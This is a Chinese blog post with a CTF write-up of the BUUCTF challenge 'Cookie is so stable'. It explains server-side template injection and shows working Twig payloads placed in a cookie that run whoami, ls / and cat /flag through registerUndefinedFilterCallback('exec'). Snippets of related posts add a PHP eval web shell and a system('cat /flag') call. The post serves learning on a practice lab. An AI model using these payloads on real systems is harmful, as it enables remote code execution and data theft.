BUUCTF——Cookie is so stable

最新推荐文章于 2025-05-13 23:11:20 发布
最新推荐文章于 2025-05-13 23:11:20 发布
阅读量485 收藏 10
点赞数 5
分类专栏: BUUCTF 文章标签: web安全 安全 网络安全 安全架构 网络攻击模型
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_71914594/article/details/147852004
版权

BUUCTF——Cookie is so stable

进入靶场

在这里插入图片描述

页面有点熟悉 跟之前做过的靶场有点像

先简单看一看靶场信息

在这里插入图片描述

有几个功能点

在这里插入图片描述

在这里插入图片描述

flag.php

随便输了个admin

在这里插入图片描述

根据题目提示

应该与cookie有关

抓包看看

在这里插入图片描述

构造payload

Cookie: PHPSESSID=ef0623af2c1a6d2012d57f3529427d52;   user={{7*'7'}}

在这里插入图片描述

有回显

漏洞能利用

确定了是SSTI注入漏洞

简单解释一下SSTI注入漏洞

SSTI(Server-Side Template Injection)是一种服务器端模板注入漏洞,发生在应用程序使用模板引擎渲染用户输入时。当用户输入被直接嵌入到模板中而没有经过适当处理时,攻击者可以注入模板指令,从而在服务器上执行任意代码。

常见的易受攻击的模板引擎

  1. Java: FreeMarker, Velocity, Thymeleaf
  2. Python: Jinja2, Mako, Tornado
  3. PHP: Twig, Smarty
  4. JavaScript: Pug (Jade), Handlebars, EJS
  5. Ruby: ERB, Slim

漏洞原理

当应用程序这样处理用户输入时容易受到攻击:

# 危险示例 (Python/Jinja2)
from jinja2 import Template

user_input = request.GET.get('name')
template = Template("Hello " + user_input)
rendered = template.render()

攻击者可以提交{{7*7}}作为输入,如果输出是Hello 49,则表明存在SSTI漏洞。

漏洞危害

  1. 远程代码执行(RCE)
  2. 敏感信息泄露
  3. 服务器文件系统访问
  4. 网络访问
  5. 权限提升

检测方法

尝试插入简单的模板表达式如{{7*7}}${7*7}<%= 7*7 %>,观察是否被计算

确定是php的SSTI漏洞

构造payload

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("whoami")}}

在这里插入图片描述

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("ls /")}}

在这里插入图片描述

回显不完整,那就盲猜在根目录下

构造payload直接读取

{{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}

在这里插入图片描述

拿到flag

flag{82e4f065-ae52-4f68-b994-ef7cd86b13be}

下播!!!!

在这里插入图片描述

[BUUCTF]刷题记录7
Huamang的博客
04-07 454
[BJDCTF2020]Cookie is so stable 模板注入——Twig模板 好像又是个模板注入 输入{{7*'7'}}得到了49,猜测是Twig 但是好像命令过滤的很严,看看能不能拿源码 hint.php提示: 可以发现提交的时候会设置一个cookie,里面的值可以进行模板注入 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("cat /flag")}}; ...
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3971
web安全-SSTI模板注入漏洞
第四十七题——[BJDCTF2020]Cookie is so stable
分享简单的安全技术
04-27 223
题目地址:https://buuoj.cn/challenges 解题思路 第一步:进入题目,在导航条看到flag链接,点击后要求提交用户名 第二步:查找漏洞点 输入admin没有反应 输入{{7*'7'}}后出现49,而不是7777777,说明是使用Twig模板而不是Jinja2 第三步:了解Twig漏洞后获取flag Twing漏洞 输入123使用burpsuite抓包,结合题目提示cookie,确定user有问题 修改user值为:{{_self.env.register
BUUCTF 个人做题记录【6-27】
qq_61620566的博客
06-27 2110
只是一个站在巨人的肩膀看世界的小孩
从0到1——BUUCTF-Web刷题之旅
weixin_45848585的博客
12-29 3479
[HCTF 2018]WarmUp 查看网页源码 发现存在source.php 于是查看source.php http://0df7b2a6-36eb-4766-8481-62b98f795732.node3.buuoj.cn/source.php 查看source.php应该为index.php的代码 同时发现存在hint.php文件 查看发现存在提示信息 //source.php //代码包含两部分 定义emmm类用于check以及对传入参数进行校验 令一部分为对传入的file参数进行校验 <?
BUUCTF解题十一道(04)
qq_45837896的博客
06-14 1945
文章目录[GWCTF 2019]我有一个数据库[BJDCTF2020]ZJCTF,不过如此[BJDCTF2020]The mystery of ip[BJDCTF2020]Mark loves cat[安洵杯 2019]easy_web[网鼎杯 2020 朱雀组]phpweb[ASIS 2019]Unicorn shop[BJDCTF2020]Cookie is so stable[BSidesCF 2020]Had a bad day[CISCN 2019 初赛]Love Math [GWCTF 2019
BUU刷题记录——2
weixin_43610673的博客
06-17 2124
[极客大挑战 2019]Upload 上传检测后缀名,文件内容不能有<? 上传a1.jpg GIF89a? <script language="php">eval($_REQUEST[cmd])</script> Bp抓包修改下文件名 不能有php /upload/a1.phtml?cmd=system(‘cat /flag’); [ACTF2020 新生赛]BackupFile /index.php.bak 下载源码 PHP的弱类型特性,int和string是无法直接比
BUUCTF刷题记录(持续更新中~)
热门推荐
xiaolong22333的博客
04-03 7万+
之前陆陆续续做过一些题,但都没有记录,这次打算巩固一下,记录下来。 .
ctf刷题和一些比赛wp
m0_73693218的博客
11-23 2489
萌新的ctf刷题日记,文章可能会有大量错误,欢迎各位大佬指教
网络安全-等级保护(等保) 2-3 GB/T 22240—2020《信息安全技术 网络安全等级保护定级指南》-2020-04-28发布【现行】
项目管理到售前,一路成长的伙伴!
05-13 798
GB 17859—1999 、GB/T 22239—2019 、GB/T 25069 、GB/T 29246—2017 、GB/T 31167—2014、 GB/T 32919—2016 和GB/T 35295—2017界定的以及下列术语和定义适用于本文件。为了便于使用, 以下重复列出了上述标准中的某些术语和定义。等级保护对象的定级要素包括:a) 受侵害的客体;b) 对客体的侵害程度。定级对象的定级方法按照以下描述进行。对于通信网络设施、云计算平台/系统等起支撑作用的定级对象和数据资源,还需参照。
常见WEB漏洞----暴力破解
2301_76419201的博客
05-07 669
暴力破解 (Brue Force) 是一种攻击方法 (穷举法),简称为“爆破”,黑客通过反复猜解和实验,旨在以暴力手段登入、访问目标主机获取服务,破坏系统安全,其属于 ATT&CK技术中的一种,常利用猜测、破解、喷洒、撞库四种子技术实现,经常作为其他漏洞攻击的载体。
网络安全顶会——SP 2025 论文清单与摘要
漏洞战争
05-09 732
时间锁谜题是一种密码学原语,它向生成者保证该谜题无法在少于T个顺序计算步骤内被破解。近年来,该技术已在公平合约签署和密封投标拍卖等场景中得到广泛应用。然而,求解者在破解前无法获得关于谜题解的任何先验保证——例如该解在特定应用场景中的"实用性"。本研究提出可验证时间锁谜题(VTLP)来解决这一问题:生成者会发布一个简洁证明,表明该解满足特定属性(同时不泄露其他信息),从而激励求解者投入资源"承诺"破解谜题。我们设计的VTLP支持对谜题解验证任意NP关系R。在技术层面,为避免"直接通过SNARK验证关系Z_RR
学习黑客 week1周测 & 复盘
qq_41179365的博客
05-04 2215
(此处请用第一人称完成,你也可以参考以下思路并结合自己的收获与挑战撰写。本周我完成了 Week 1 的“安全基础理论入门”阶段,对信息安全的全局有了清晰的认识。Day 1 学习了 CIA 三要素,能用实例区分机密性、完整性和可用性;Day 2 探究了 OWASP Top 10,亲手制作思维导图加深了漏洞分类;Day 3 通过 ATVR 风险模型和攻击生命周期的对应,首次将抽象风险量化并绘制成脑图;Day 4 理解了中国《网络安全法》及等保 2.0 的核心红线,并制作了“法律速查卡”;
EDR与XDR如何选择适合您的网络安全解决方案
最新发布
hello.reader
05-13 657
随着网络威胁日益复杂,勒索软件、零日攻击和高级持续性威胁(APT)对企业构成重大挑战。**端点检测与响应(EDR)**和**扩展检测与响应(XDR)**是当前网络安全的两大核心工具。本文将深入解析EDR与XDR的功能、原理、差异及适用场景,助您选择最佳解决方案。
SpringBoot框架开发网络安全科普系统开发实现
幽络源
05-10 625
基于SpringBoot的网络安全科普系统开发方案,系统包含知识科普、案例学习、在线测试等功能,适合网络安全教育培训。
网络安全】SQL注入
Dalik1018的博客
05-12 1714
SQL 注入是一种常见的网络攻击手段,它专门针对程序员在编写代码时的疏忽。你在网上注册了一个账号,填写用户名和密码后点击提交。正常情况下,网站会将你输入的信息发送到数据库进行验证,看看用户名是否存在,密码是否正确。但如果网站对用户输入的数据没有进行严格的检查,黑客就有机会在你输入的内容里添加一些特殊的 SQL 语句。
CVE体系若消亡将如何影响网络安全防御格局
FreeBuf_的博客
05-07 844
CVE体系若崩溃,全球网络安全防御将陷入混乱。
第九届御网杯网络安全大赛初赛WP
苏生要努力
05-13 507
一键解码转字符串得到一串base:ZmxhZ3tHaCQ4TG1QNV5kUTJmTjYmfQ==,然后后面一键解码得到flag:flag{Gh$8LmP5^dQ2fN6&}其和为:4/Π,后面提示说被分成四份,所以猜测完整礼物是Π谐音派,pie,到后面提示凯撒密码,flag{pie},偏移量九得到flag提交。然后把第九栏得到的密文一键解码,得到flag:flagDAUEByV8z{736}4C9。print("flag值为: flag{" + str(flag) + "}")print(f"[!
引言:Client Hello 为何是 HTTPS 安全的核心?
2501_90994755的博客
05-10 785
Cipher Suites TLS_AES_256_GCM_SHA384 TLS 1.3 仅保留 5 个强密码套件,而 TLS 1.2 支持数十种(需谨慎过滤弱算法)openssl s_client -connect example.com:443 -tls1_3 # 手动测试 TLS 1.3。使用 TLS_RSA_WITH_3DES_EDE_CBC_SHA(3DES 算法已过时,易受 SWEET32 攻击)。欢迎在评论区分享经历!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值